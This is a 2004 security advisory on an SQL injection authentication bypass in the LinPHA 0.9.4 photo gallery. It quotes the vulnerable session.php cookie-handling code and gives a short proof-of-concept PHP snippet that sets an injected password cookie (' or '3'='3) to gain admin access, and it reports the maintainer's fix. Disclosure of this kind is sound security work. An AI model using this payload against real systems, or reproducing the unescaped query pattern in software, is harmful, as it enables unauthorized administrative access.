///////////////////////////////////////////////////// //// Vulnerable Program: Linpha //// //// Url: http://linpha.sf.net //// //// Version: 0.9.4 Latest version //// //// Date: Today, July 28 of 2004 //// //// Author: Fernando Quintero (a.k.a nonroot) //// Email: nando@xxxxxxxxxxx ////////////////////////////////////////////////////// I. Affected software description: LinPHA is easy to use, multilingual, flexible photo/image archive/album/gallery written in PHP. It uses a SQL database to store information about your pictures. It comes with a HTML based installer, so you don't need experience in setting up SQL DB II. Bug There is a bug in the code that allows a possible attacker to bypass the authentication of the linpha admin. It can do it without using a password, you only have to modify the cookies of the session, and then browsing the admin.php script The bug is located aproximately in [25] of the session.php file: 1. Sql injection allows to bypass the auth // Read Cookie 24 if(read_config('autologin')) { 25 if(!isset($_SESSION['user_name']) && isset($_COOKIE["linpha_userid"]) && $_COOKIE["linpha_userid"]!=""&& isset($_COOKIE["linpha_password"])&&$_COOKIE["linpha_ password"]!="") 26 { 27 $query_username = $GLOBALS['db']->Execute("SELECT nickname, level, groups FROM ".PREFIX."users ". 28 "WHERE ID = '".$_COOKIE["linpha_userid"]."' AND ". 29 "password = '".$_COOKIE["linpha_password"]."'"); 30 31 if($row = $query_username->FetchRow()) 32 { 33 $_SESSION["REMOTE_ADDR"] = @$_SERVER["REMOTE_ADDR"]; 34 $_SESSION["user_name"] = $row[0]; 35 $_SESSION["user_pass"] = $_COOKIE["linpha_password"]; 36 $_SESSION["user_level"] = $row[1]; // Store user level 37 $_SESSION["user_groups"] = $row[2]; // Store user group membership 38 } 39 else // wrong cookie 40 { 41 setcookie("linpha_userid"); // delete cookie linpha_userid 42 setcookie("linpha_password"); // delete cookie linpha_password 43 } 44 } 45 } There are two cookies that are validated: linpha_userid and linpha_password. So,I would be get in without a password If I inject those cookies . I wrote this lines in a test.php: 1 <?PHP 2 setcookie("linpha_userid","1",time()+86400*365,'/linpha'); 3 setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha'); 4 ?> The script is loaded before the admin.php file, then the new cookies will inject the query in [29]. This is posibble if the magic_quote variable is setting to Off in the php.ini. but anyway, these cookies should be checked before using it in the query. ok, That's it! III. Solution ¨¨¨¨¨¨¨¨ The main coder was contacted and the code was fixed in the cvs ;). IV. Greetings - Greets to GIGAX people, Sandra195 specially - Greets All the community. I learn of you! V. Contact Fernando Quintero nando@xxxxxxxxxxx Medellín-Colombia VI. Final words !!! Viva Colombia !!!!!!!!
